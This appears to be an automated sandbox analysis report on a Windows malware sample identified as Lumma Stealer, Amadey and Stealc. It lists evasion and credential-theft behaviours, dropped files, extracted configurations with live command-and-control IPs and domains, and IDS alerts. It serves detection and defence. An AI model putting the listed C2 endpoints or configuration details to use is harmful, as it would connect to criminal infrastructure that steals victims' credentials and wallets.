Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1541351
MD5: 20430d8d39abdf5fc6b9654a561b7e83
SHA1: 9d1c8689f22d03701e34afd63e0bda0a627bb8b8
SHA256: 69d745bdccdf2c55a32b1fcb94ce3b99e389978e505f8b6add95fc11a043e8b4
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000003.00000002.2368072745.0000000000131000.00000040.00000001.01000000.00000006.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 39.2.num.exe.180000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 26e226f915.exe.6976.11.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["dissapoiznw.store", "licendfilteo.site", "clearancek.site", "eaglepawnoy.store", "mobbipenju.store", "bathdoomgaz.store", "spirittunek.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe ReversingLabs: Detection: 44%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1USEAVXFST1CCUTT4RKEBB0FQ1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\TBWW22TPTEFJD0MFEV8VM5Q8IDL74.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001227001\ef2532c0b1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ST44OD0PMG8MCMYJRN4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9NWW1UIUAOJA8NFOZHWEDA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\M0SHVBI03XTU9LNHD2O8UA8TC8F.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001228001\90bef5afae.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\PPP8FUHMDUG38MZT5OEEJAB.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\J5ZZ1Y85CCQU7EF0IIBN6DLOUVMA.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49995 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50003 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50004 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50005 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50010 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:50017 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50024 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50034 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50035 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50036 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50038 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50044 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50050 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50058 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50077 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000003.2371701533.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, M0SHVBI03XTU9LNHD2O8UA8TC8F.exe, 00000006.00000002.2505556141.0000000000A92000.00000040.00000001.01000000.0000000B.sdmp
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: number of queries: 1474
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 11_2_008799D0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0083D110
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0083D110
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 11_2_0083FCA0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 11_2_00840EEC
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_00875700
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 11_2_00846F91
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 11_2_008349A0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 11_2_00873920
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 11_2_0084D961
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then jmp eax 11_2_00841ACD
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_008442FC
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then jmp eax 11_2_00841A3C
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 11_2_00874A40
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 11_2_00835A50
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_00843BE2
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 11_2_00841BEE
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov ebp, eax 11_2_0083A300
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 11_2_00879B60
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h 11_2_0085CCD0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp] 11_2_00879CE0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 11_2_00879CE0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 11_2_0084B410
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov word ptr [eax], cx 11_2_0084D457
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+0Ch] 11_2_0085C470
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h] 11_2_00838590
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh 11_2_0085FD10
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 11_2_00846536
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esp+40h] 11_2_00841E93
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx edi, byte ptr [ecx+esi] 11_2_00836EA0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then movzx ecx, word ptr [ebp+00h] 11_2_0083BEB0
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then cmp byte ptr [ebx], 00000000h 11_2_00846EBF
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 11_2_00846F91
Source: firefox.exe Memory has grown: Private usage: 1MB later: 189MB

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:63233 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:62979 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:64853 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:54902 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:57464 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:62811 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:60695 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:52918 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49819 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49992 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:55324 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:62744 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:64287 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50091 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:53085 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:60779 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:59929 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:55961 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49993
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49996 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50000 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:59100 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:65109 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:55478 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:49816 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:54200 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:65448 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:64451 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49999 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50006 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:65096 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:50929 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:56637 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:49291 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:64074 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:54065 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:64110 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50015 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50020 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50051 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:65515 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:49842 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50063 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50065 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50098 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 104.21.53.8:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 104.21.53.8:443
